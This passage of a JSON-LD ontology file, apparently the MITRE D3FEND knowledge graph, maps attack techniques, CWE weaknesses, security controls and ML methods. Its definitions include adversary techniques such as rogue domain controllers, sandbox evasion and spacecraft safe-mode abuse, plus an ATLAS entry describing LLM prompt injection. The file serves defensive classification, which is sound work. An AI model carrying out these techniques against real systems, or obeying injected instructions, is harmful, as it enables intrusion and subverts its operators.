          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system performs an integrity check of organization-defined software at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002710"
    },
    {
      "@id": "d3f:MicrosoftWordDOTXFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOTX File"
    },
    {
      "@id": "d3f:M1050",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "d3f:ExceptionHandlerPointerValidation"
        },
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:ShadowStackComparisons"
        }
      ],
      "rdfs:label": "Exploit Protection"
    },
    {
      "@id": "d3f:Reference-Windows10STIG",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.stigviewer.com/stig/windows_10/"
      },
      "d3f:kb-abstract": "Windows 10 STIG guidance.",
      "d3f:kb-reference-of": {
        "@id": "d3f:ApplicationConfigurationHardening"
      },
      "d3f:kb-reference-title": "Windows 10 Security Technical Implementation Guide",
      "rdfs:label": "Reference - Windows 10 STIG"
    },
    {
      "@id": "d3f:BootstrapAggregating",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BA",
      "d3f:definition": "Bootstrap aggregating, also called bagging (from bootstrap aggregating), is a machine learning ensemble meta-algorithm designed to improve the stability and accuracy of machine learning algorithms used in statistical classification and regression. It also reduces variance and helps to avoid overfitting. Although it is usually applied to decision tree methods, it can be used with any type of method. Bagging is a special case of the model averaging approach.",
      "d3f:kb-article": "## References\nBootstrap aggregating. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Bootstrap_aggregating).",
      "rdfs:label": "Bootstrap Aggregating",
      "rdfs:subClassOf": {
        "@id": "d3f:ResamplingEnsemble"
      }
    },
    {
      "@id": "d3f:TA0029",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Privilege Escalation - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Privilege Escalation"
    },
    {
      "@id": "d3f:CWE-637",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-637",
      "d3f:definition": "The product uses a more complex mechanism than necessary, which could lead to resultant weaknesses when the mechanism is not correctly understood, modeled, configured, implemented, or used.",
      "d3f:synonym": "Unnecessary Complexity",
      "rdfs:label": "Unnecessary Complexity in Protection Mechanism (Not Using 'Economy of Mechanism')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-657"
      }
    },
    {
      "@id": "d3f:ATLASTactic",
      "@type": "owl:Class",
      "d3f:definition": "An ATLAS Tactic is a categorical classification of techniques within the MITRE ATLAS™ framework, representing adversarial goals particular to artificial intelligence systems. It also adapts MITRE ATT&CK® Enterprise Matrix tactics by integrating machine learning concepts, thus capturing the unique motives behind actions in AI-specific operations.",
      "rdfs:label": "ATLAS Tactic",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASThing"
      }
    },
    {
      "@id": "d3f:DE-0005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0005",
      "d3f:definition": "The adversary exploits the spacecraft’s recovery posture to bypass controls that are stricter in nominal operations. During safe-mode, vehicles often accept contingency dictionaries, relax rate/size and timetag checks, activate alternate receivers or antennas, and emit reduced or summary telemetry. By timing actions to this state, or deliberately inducing it, the attacker issues maintenance-looking edits, loads, or mode changes that proceed under broadened acceptance while downlink visibility is thinned. Unauthorized activity blends with anomaly response, evading both automated safeguards and operator suspicion.",
      "d3f:modifies": {
        "@id": "d3f:VehicleOperatingMode"
      },
      "rdfs:label": "Subvert Protections via Safe-Mode - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0005/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N90a7bcf6667e4ec99747ad4621b4d33c"
        }
      ],
      "skos:prefLabel": "Subvert Protections via Safe-Mode"
    },
    {
      "@id": "_:N90a7bcf6667e4ec99747ad4621b4d33c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VehicleOperatingMode"
      }
    },
    {
      "@id": "d3f:T1633",
      "@type": "owl:Class",
      "d3f:attack-id": "T1633",
      "d3f:definition": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors after checking for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the payload. They may also search for VME artifacts before dropping further payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) during automated discovery to shape follow-on behaviors.",
      "rdfs:label": "Virtualization/Sandbox Evasion - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Virtualization/Sandbox Evasion"
    },
    {
      "@id": "d3f:Reference-DNSWhitelist-DNSWL-EmailAuthenticationMethodExtension",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://datatracker.ietf.org/doc/html/rfc8904"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSAllowlisting"
      },
      "d3f:kb-reference-title": "DNS Whitelist (DNSWL) Email Authentication Method Extension",
      "rdfs:label": "Reference - DNS Whitelist (DNSWL) Email Authentication Method Extension"
    },
    {
      "@id": "d3f:Density-weightedMethod",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DWM",
      "d3f:definition": "An Actvie Learning technique that uses a density estimate meta-parameter to avoid sampling sparsely populated regions of the feature space and can be based parametrically or from a parameter free model.",
      "d3f:kb-article": "## References\nIntro to Active Learning. inovex Blog. [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Density-weighted Method",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:T1207",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1207",
      "d3f:definition": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:produces": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "rdfs:label": "Rogue Domain Controller",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:Nc865a11cbbec4bed95ec029b72950137"
        },
        {
          "@id": "_:Nd289bd4956bf4f54911ef7d11bc39328"
        }
      ]
    },
    {
      "@id": "_:Nc865a11cbbec4bed95ec029b72950137",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "_:Nd289bd4956bf4f54911ef7d11bc39328",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:HardwareDeviceConfiguration",
      "@type": "owl:Class",
      "d3f:definition": "Information used to configure the parameters and settings for hardware devices.",
      "rdfs:label": "Hardware Device Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:CWE-366",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-366",
      "d3f:definition": "If two threads of execution use a resource simultaneously, there exists the possibility that resources may be used while invalid, in turn making the state of execution undefined.",
      "rdfs:label": "Race Condition within a Thread",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:AuthenticationServiceApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software application designed to verify the identity of users or devices.",
      "d3f:instructs": {
        "@id": "d3f:AuthenticationService"
      },
      "rdfs:label": "Authentication Service Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N95ac79caf17643bf8452afc3f3ba3629"
        }
      ]
    },
    {
      "@id": "_:N95ac79caf17643bf8452afc3f3ba3629",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "d3f:description",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "A statement that represents something in words.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06737512-n"
      },
      "rdfs:label": {
        "@language": "en",
        "@value": "description"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-annotation-property"
      }
    },
    {
      "@id": "d3f:TA0009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to gather data of interest to their goal.\n\nCollection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives. Frequently, the next goal after collecting data is to either steal (exfiltrate) the data or to use the data to gain more information about the target environment. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.",
      "d3f:display-order": 9,
      "rdfs:label": "Collection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:T1036.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.003",
      "d3f:definition": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)",
      "d3f:may-create": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:OperatingSystemExecutableFile"
      },
      "rdfs:label": "Rename Legitimate Utilities",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:N0d98efc26d5244c0906fc37d46273eca"
        },
        {
          "@id": "_:N705185fd6c5f43f4ad6a60c506db5db0"
        }
      ]
    },
    {
      "@id": "_:N0d98efc26d5244c0906fc37d46273eca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N705185fd6c5f43f4ad6a60c506db5db0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemExecutableFile"
      }
    },
    {
      "@id": "d3f:T1630.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1630.002",
      "d3f:definition": "Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location.(Citation: Android DevicePolicyManager 2019)",
      "rdfs:label": "File Deletion - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1630"
      },
      "skos:prefLabel": "File Deletion"
    },
    {
      "@id": "d3f:T1402",
      "@type": "owl:Class",
      "d3f:attack-id": "T1402",
      "d3f:definition": "An intent is a message passed between Android application or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1624.001",
      "rdfs:label": "Broadcast Receivers - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1624.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileExecutionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Broadcast Receivers"
    },
    {
      "@id": "d3f:AML.T0051",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0051",
      "d3f:definition": "An adversary may craft malicious prompts as inputs to an LLM that cause the LLM to act in unintended ways.\nThese \"prompt injections\" are often designed to cause the model to ignore aspects of its original instructions and follow the adversary's instructions instead.\n\nPrompt Injections can be an initial access vector to the LLM that provides the adversary with a foothold to carry out other steps in their operation.\nThey may be designed to bypass defenses in the LLM, or allow the adversary to issue privileged commands.\nThe effects of a prompt injection can persist throughout an interactive session with an LLM.\n\nMalicious prompts may be injected directly by the adversary ([Direct](/techniques/AML.T0051.000)) either to leverage the LLM to generate harmful content or to gain a foothold on the system and lead to further effects.\nPrompts may also be injected indirectly when as part of its normal operation the LLM ingests the malicious prompt from another data source ([Indirect](/techniques/AML.T0051.001)). This type of injection can be used by the adversary to a foothold on the system or to target the user of the LLM.\nMalicious prompts may also be [Triggered](/techniques/AML.T0051.002) user actions or system events.",
      "rdfs:label": "LLM Prompt Injection - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0051"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExecutionTechnique"
      },
      "skos:prefLabel": "LLM Prompt Injection"
    },
    {
      "@id": "d3f:CWE-446",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-446",
      "d3f:definition": "The user interface does not correctly enable or configure a security feature, but the interface provides feedback that causes the user to believe that the feature is in a secure state.",
      "rdfs:label": "UI Discrepancy for Security Feature",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-684"
      }
    },
    {
      "@id": "d3f:CWE-1277",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1277",
      "d3f:definition": "The product does not provide its users with the ability to update or patch its firmware to address any vulnerabilities or weaknesses that may be present.",
      "rdfs:label": "Firmware Not Updateable",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1329"
      }
    },
    {
      "@id": "d3f:CWE-1395",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1395",
      "d3f:definition": "The product has a dependency on a third-party component that contains one or more known vulnerabilities.",
      "rdfs:label": "Dependency on Vulnerable Third-Party Component",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-657"
      }
    },
    {
      "@id": "d3f:T1001.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1001.001",
      "d3f:definition": "Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.",
      "rdfs:label": "Junk Data",
      "rdfs:subClassOf": {
        "@id": "d3f:T1001"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:OperatingSystemMonitoring"
      },
      "d3f:control-name": "System Monitoring",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SI-4"
    },
    {
      "@id": "d3f:T1208",
      "@type": "owl:Class",
      "d3f:attack-id": "T1208",
      "d3f:definition": "Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1558.003",
      "rdfs:label": "Kerberoasting",
      "rdfs:seeAlso": {
        "@id": "d3f:T1558.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:TunnelCloseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network tunnel is terminated, ending encapsulated communication and releasing the associated resources.",
      "rdfs:label": "Tunnel Close Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TunnelEvent"
        },
        {
          "@id": "_:Nfbb6309aaa5740cc84da8aa719428810"
        }
      ]
    },
    {
      "@id": "_:Nfbb6309aaa5740cc84da8aa719428810",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TunnelOpenEvent"
      }
    },
    {
      "@id": "d3f:InboundSessionVolumeAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:InboundSessionVolumeAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-ISVA",
      "d3f:definition": "Analyzing inbound network session or connection attempt volume.",
      "d3f:kb-article": "## How it works\nNetwork appliances are configured to alert on certain packets that typically are involved in DoS attacks. Typical packets include ICMP packets and SYN requests that are commonly used to flood networks. A sampling period is used to define a time window in which collected counts of the identified packets can be measured. If the collected number of packets exceeds a predefined limit then an alert is generated.\n\n## Considerations\nScalability as volume of attacks increase; single servers may not have the memory and storage resources to handle high volumes of network traffic.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DetectingDDoSAttackUsingSnort"
        },
        {
          "@id": "d3f:Reference-IdentifyingADenial-of-serviceAttackInACloud-basedProxyService-CloudfareInc."
        },
        {
          "@id": "d3f:Reference-MethodAndSystemForUDPFloodAttackDetection-RioreyLLC"
        },
        {
          "@id": "d3f:Reference-ProtectingAgainstDistributedDenialOfServiceAttacks-CiscoTechnologyInc."
        },
        {
          "@id": "d3f:Reference-ProtectingAgainstDistributedNetworkFloodAttacks-JuniperNetworksInc."
        }
      ],
      "rdfs:label": "Inbound Session Volume Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N986722107401435e91f8c95bab72a053"
        }
      ]
    },
    {
      "@id": "_:N986722107401435e91f8c95bab72a053",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:ThinClientComputer",
      "@type": "owl:Class",
      "d3f:definition": "A thin client is a lightweight computer that has been optimized for establishing a remote connection with a server-based computing environment. The server does most of the work, which can include launching software programs, performing calculations, and storing data. This contrasts with a fat client or a conventional personal computer; the former is also intended for working in a client-server model but has significant local processing power, while the latter aims to perform its function mostly locally. Thin clients are shared computers as the thin client's computing resources are provided by a remote server.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Thin_client"
      },
      "rdfs:label": "Thin Client Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:SharedComputer"
      }
    },
    {
      "@id": "d3f:DHCPLeaseExpireEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating that a DHCP lease has expired, rendering the previously assigned IP address available for reassignment to other devices.",
      "rdfs:label": "DHCP Lease Expire Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N0025c71428514f86b93f06f3985d38c8"
        }
      ],
      "skos:altLabel": "DHCPLEASEEXPIRE"
    },
    {
      "@id": "_:N0025c71428514f86b93f06f3985d38c8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPAckEvent"
      }
    },
    {
      "@id": "d3f:DigitalVideo",
      "@type": "owl:Class",
      "d3f:definition": "Digital video is an electronic representation of moving visual images (video) in the form of encoded digital data.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Digital_video",
      "rdfs:label": "Digital Video",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:interprets",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x interprets y: The subject x interprets the executable script y. The definition of interprets here is 'Parse the source code and perform its behavior directly.'",
      "rdfs:label": "interprets",
      "rdfs:seeAlso": {
        "@id": "dbr:Interpreter_(computing)"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:executes"
        },
        {
          "@id": "d3f:may-interpret"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1253",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1253",
      "d3f:definition": "The logic level used to set a system to a secure state relies on a fuse being unblown. An attacker can set the system to an insecure state merely by blowing the fuse.",
      "rdfs:label": "Incorrect Selection of Fuse Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CCI-002400_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system audits the identity of internal users associated with denied outgoing communications traffic posing a threat to external information systems.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OutboundTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002400"
    },
    {
      "@id": "d3f:Reference-UserLoginActivityMonitoring_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-10-001/"
      },
      "d3f:kb-abstract": "Monitoring logon and logoff events for hosts on the network is very important for situational awareness. This information can be used as an indicator of unusual activity as well as to corroborate activity seen elsewhere.\n\nCould be applied to a number of different types of monitoring depending on what information is desired. Some use cases include monitoring for all remote connections and building login timelines for users. Logon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:AuthenticationEventThresholding"
      },
      "d3f:kb-reference-title": "CAR-2013-10-001: User Login Activity Monitoring",
      "rdfs:label": "Reference - CAR-2013-10-001: User Login Activity Monitoring - MITRE"
    },
    {
      "@id": "d3f:Reference-FIPS-201-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.201-3.pdf"
      },
      "d3f:kb-abstract": "This document establishes a standard for a Personal Identity Verification (PIV) system that meets the control and security objectives of Homeland Security Presidential Directive-12. It is based on secure and reliable forms of identity credentials issued by the Federal Government to its employees and contractors. These credentials are used by mechanisms that authenticate individuals who require access to federally controlled facilities, information systems, and applications. This Standard addresses requirements for initial identity proofing, infrastructure to support interoperability of identity credentials, and accreditation of organizations and processes issuing PIV credentials.",
      "d3f:kb-author": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ElectronicLockMonitoring"
        },
        {
          "@id": "d3f:ProximitySensorMonitoring"
        }
      ],
      "d3f:kb-reference-title": "FIPS 201-3: Personal Identity Verification (PIV) of Federal Employees and Contractors",
      "rdfs:label": "Reference - FIPS 201-3"
    },
    {
      "@id": "d3f:AccessMediationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the intermediary control mechanism that evaluates access requests and enforces access control decisions, ensuring that subjects' resource interactions comply with the established access policies.",
      "rdfs:label": "Access Mediation Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessControlEvent"
        },
        {
          "@id": "_:N3b63fffd8eb54974b29e97d397ed06a3"
        }
      ],
      "skos:altLabel": "Access Enforcement Event"
    },
    {
      "@id": "_:N3b63fffd8eb54974b29e97d397ed06a3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessMediator"
      }
    },
    {
      "@id": "d3f:CWE-796",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-796",
      "d3f:definition": "The product receives data from an upstream component, but only accounts for special elements positioned relative to a marker (e.g. \"at the beginning/end of a string; the second argument\"), thereby missing remaining special elements that may exist before sending it to a downstream component.",
      "rdfs:label": "Only Filtering Special Elements Relative to a Marker",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-795"
      }
    },
    {
      "@id": "d3f:T1090.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1090.002",
      "d3f:definition": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "External Proxy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1090"
        },
        {
          "@id": "_:N7886404da5d8459986d2b0fc68eca4a3"
        }
      ]
    },
    {
      "@id": "_:N7886404da5d8459986d2b0fc68eca4a3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:control-name": "Account Management | Disable Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-2(3)"
    },
    {
      "@id": "d3f:EncryptedCredential",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A credential that is encrypted.",
      "rdfs:label": "Encrypted Credential",
      "rdfs:subClassOf": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:SoftwarePackage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Software Package is a bundled collection of files, code, and metadata that provides functionality, libraries, or applications.",
      "rdfs:label": "Software Package",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/package"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:Reference-ProtectingWebApplicationsFromUntrustedEndpointsUsingRemoteBrowserIsolation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US11477248B2/"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:Application-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Protecting web applications from untrusted endpoints using remote browser isolation",
      "rdfs:label": "Reference - Protecting web applications from untrusted endpoints using remote browser isolation"
    },
    {
      "@id": "d3f:CWE-405",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-405",
      "d3f:definition": "The product does not properly control situations in which an adversary can cause the product to consume or produce excessive resources without requiring the adversary to invest equivalent work or otherwise prove authorization, i.e., the adversary's influence is \"asymmetric.\"",
      "rdfs:label": "Asymmetric Resource Consumption (Amplification)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-400"
        },
        {
          "@id": "d3f:CWE-664"
        }
      ]
    },
    {
      "@id": "d3f:TransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TL",
      "d3f:definition": "Transfer learning (TL) is a research problem in machine learning (ML) that focuses on storing knowledge gained while solving one problem and applying it to a different but related problem.",
      "d3f:kb-article": "## References\nTransfer learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Transfer_learning).",
      "rdfs:label": "Transfer Learning",
      "rdfs:seeAlso": [
        {
          "@id": "https://arxiv.org/abs/1808.01974"
        },
        {
